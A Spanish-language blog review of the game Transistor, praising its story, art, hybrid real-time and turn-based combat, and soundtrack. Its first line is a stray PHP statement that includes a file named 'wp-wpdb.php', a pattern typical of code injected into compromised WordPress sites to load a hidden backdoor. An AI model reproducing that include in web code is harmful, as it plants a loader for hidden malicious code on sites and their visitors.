if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Transistor, luchando contra el Proceso – La Fortaleza de LeChuck

Análisis Transistor, luchando contra el Proceso

Transistor es un juego action RPG desarrollado por Supergiant Games, la compañía indie alabada y galardonada por su primer título, que no es otro que Bastion. Después de ser presentado en el PAX Prime de 2013, el pasado 20 de mayo aterrizó por fin Transistor, que refuerzan mi idea de que los juegos indies son los que mantienen la frescura en la industria y mi ilusión por los videojuegos. Desenvainemos nuestra espada para luchar contra el Proceso.

transistor_pc

En Transistor tendremos el control de Red, una popular cantante de la ciudad de Cloudbank, que una noche después de una actuación es atacada. Sin embargo, un hombre le salva la vida interponiéndose entre la espada Transistor y ella. Después de este incidente, Red pierde la voz, y el hombre, quien Red conoce, el cuerpo, emitiendo su voz a través de la Transistor. La voz guiará a Red por toda la ciudad, que está siendo atacada por el Proceso, un ejército de robots controlado por el grupo de la Camerata. Aquí comienza el viaje de Red por los diferentes rincones de Cloudbank con el fin de parar el proceso y a los que están detrás.

La información sobre la historia es más bien escasa y en ocasiones ambigua, pero para aportar algo de luz y conocer nuevos aspectos culturales, políticos y sociales están las terminales OVC, puntos de información y opinión. El juego es lineal, sin embargo, cuenta con pequeños desvíos y sitios señalizados donde Red observa y murmura, y la voz de la Transistor aporta información adicional de los acontecimientos que han ido produciéndose en la ciudad consecuencia del Proceso y la Camerata.

transistor_pc_2

Lo que más destaca de Transistor es el arte, las ilustraciones a modo de cinemática que iremos viendo durante el juego, y que acompañan al material promocional, son simplemente maravillosas y recuerdan al estilo cómic y pintura tradicional. Todo ello se funde en la atmosfera de ciencia ficción con cientos de elementos cibernéticos que inundan la ciudad de Cloudbank, que parece las tripas de un circuito. Además, la música completa el conjunto, y decenas de pistas de varios estilos irán sonando en nuestro recorrido por la ciudad. Además, y como detalle marca de la casa, Red acompañará las melodías con su sutil tarareo siempre que lo deseemos. Esto es simplemente fascinante.

transistor_pc_3
¡Enciendan los focos! Red va a tararear!

¿Y la acción? Ahora vamos con eso, porque hay una buena ración de ella. A través de la vista isométrica, nos enfrentaremos a diferentes robots del Proceso con nuestra Transistor, la cual ejecutará un total de 4 funciones configurables. Las funciones vienen heredadas de los miembros ilustres fallecidos de Cloudbank que iremos encontrando, por lo que cada una tiene su pequeña historia que se irá completando mediante nuestro avance. En cada Punto de Acceso, podemos cambiarlas e incluir otras funciones secundarias a las principales, lo que reforzará su daño. Por si esto fuera poco, también se desbloquearán más adelante otras mejoras para Red, además, está la posibilidad de subir niveles extras entrando por las puertas traseras que se hallan repartidas por todo Cloudbank.

transistor_pc_4

He dicho que Transistor es un ARPG pero también tiene un sistema de turnos llamado Turn. Cuando presionamos sobre el botón de Turn, el tiempo se para y podemos construir nuestra estrategia sobre una barra limitada que se completa con nuestros movimientos y funciones. Al volver a apretar el botón de Turn, se inicia automáticamente una secuencia con nuestras indicaciones, y hasta que no pasen unos escasos segundos, y se cargue de nuevo la barra, no podremos ejecutar algunas funciones. El modo ARPG y por turnos está configurado de forma original y cómoda, y combinar ambos es fundamental para llegar sanos y salvos al final del juego.

transistor_pc_5

Hablemos ahora más extensamente de otro de los puntos fuertes de Transistor, concretamente de su impresionante banda sonora compuesta y producida por Darren Korb con la inestimable colaboración de Ashley Barrett en el apartado vocal. La OST mezcla diferentes estilos de música, pero Korb la define como «Old-world Electronic Post-rock». La voz Ashley en los temas vocales hechiza, y si Transistor no contara con el increíble trabajo de esta pareja, el encanto del juego bajaría a la mitad. Los 23 temas de Transistor se pueden escuchar desde la web y seguramente acabarás seducido por esas enigmáticas melodías. Como pequeño ejemplo del particular y atrayente estilo de la OST de Transistor, os dejo el tema vocal In Circles. Disfrutad de la grandiosa voz de Ashley Barrett.

Transistor es un juego ágil y fresco, que ofrece unas 10 horas de diversión, aunque para descubrir todos sus secretos y completarlo, será necesario una segunda partida. Red es un personaje que aunque solo emita murmullos y tarareos rebosa carisma, con un diseño poco habitual y un estilismo atrayente. Transistor es arte en estado puro que choca con otras super producciones millonarias de duración parecida, con mucho marketing y  cinématica pero poco gameplay. En definitiva, Supergiant Games lo está haciendo bien, y desde aquí os invito a que descubráis las aventuras de Red en Steam o PS4 por menos de 20€